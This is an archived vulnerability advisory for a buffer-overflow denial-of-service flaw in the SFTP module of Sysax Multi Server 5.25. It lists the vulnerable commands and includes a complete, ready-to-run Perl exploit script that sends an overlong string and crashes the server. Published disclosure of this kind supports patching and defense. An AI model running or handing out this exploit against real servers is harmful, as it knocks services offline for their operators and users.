AOH :: HP Unsorted S :: B1A-1327.HTM

Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities



Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities
Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities



=0D
[*]Title:	Sysax Multi Server(SFTP module) "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities=0D
[*]Product:	Sysax Multi Server=0D
[*]Vendor:	Codeorigin, LLC=0D
[*]Version:	5.25 (earlier versions may also be affected)=0D
[*]Platform:	Windows=0D
[*]Type of Vulnerability:	Buffer overflow -->DoS=0D
[*]Risk rating:	Medium	=0D
[*]Date of Discovery:	21-Jun-2010=0D
[*]Discoverd by:	leinakesi (leinakesi[at]gmail[dot]com)=0D
=0D
=0D
=0D
Overview:=0D
1.vendor description of software=0D
------------------------------------------------=0D
A SSH2 and FTP server for Microsoft windows=AE that enables system administrators to support multiple protocol access to user accounts. FTPS, SFTP, and HTTPS based file transfers are supported in addition to FTP, Telnet, and Secure Shell access. Sysax Multi Server lets system administrators authenticate users using existing windows user accounts or by creating custom accounts, or a combination of both methods. A convenient web browser based administration interface makes it easy to monitor the status of the server remotely.It is easy to install and does not require advanced IT skills to manage.=0D
2.vulnerability details:=0D
------------------------------------------------=0D
Several Denial of Service vulnerabilities exist in SFTP module of Sysax Multi Server. The unsafe commands include "open","unlink", "mkdir" and etc. .which can not handle overlength strings properly.=0D
=0D
If you could log on the server successfully, take the following steps and the Sysax Multi server will crash which would lead to Denial of Service attack:=0D
#initialize $FUZZ = "A" x 1000=0D
1.	$ssh2 = Net::SSH2->new();=0D
2.	$ssh2->connect($server, $port);=0D
3.	$ssh2->auth_password($user, $pass);=0D
#there are several ways to compromise the server, I list them here as 4.1, 4.2, and etc. ...=0D
4.1	$scpget = $ssh2->scp_get($FUZZ);=0D
4.2	$sftp = $ssh2->sftp(); $o1 = $sftp->open($FUZZ);=0D
4.3	$sftp = $ssh2->sftp(); $u = $sftp->unlink(FUZZ);=0D
4.4	$sftp = $ssh2->sftp(); $m = $sftp->mkdir($FUZZ);=0D
5	$ssh2->disconnect();=0D
=0D
=0D
Exploit example:=0D
=0D
#!/usr/bin/perl=0D
#leinakesi[at]gmail.com=0D
#Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities=0D
=0D
use Net::SSH2;=0D
use Getopt::Std;=0D
=0D
$FUZZ = "A" x 1000;=0D
=0D
getopts('S:P:u:p:', \%opts);=0D
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};=0D
=0D
if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )=0D
{=0D
	print "usage:\n\tperl	test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";=0D
	print "\tperl	test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";=0D
	exit(0);=0D
}=0D
=0D
$ssh2 = Net::SSH2->new();=0D
$ssh2->connect($server, $port) || die "can not connect the server, please check.\n";=0D
$ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n";=0D
#any of the following commands will cause the server carsh.=0D
=0D
$scpget = $ssh2->scp_get($FUZZ) || die "server crashed.\n";=0D
#	$sftp = $ssh2->sftp(); $o1 = $sftp->open($FUZZ);=0D
#	$sftp = $ssh2->sftp(); $u = $sftp->unlink(FUZZ);=0D
#	$sftp = $ssh2->sftp(); $m = $sftp->mkdir($FUZZ);=0D
=0D
=0D
print "\nover\n";=0D
=0D
$ssh2->disconnect();=0D
exit(0);=0D
=0D
=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.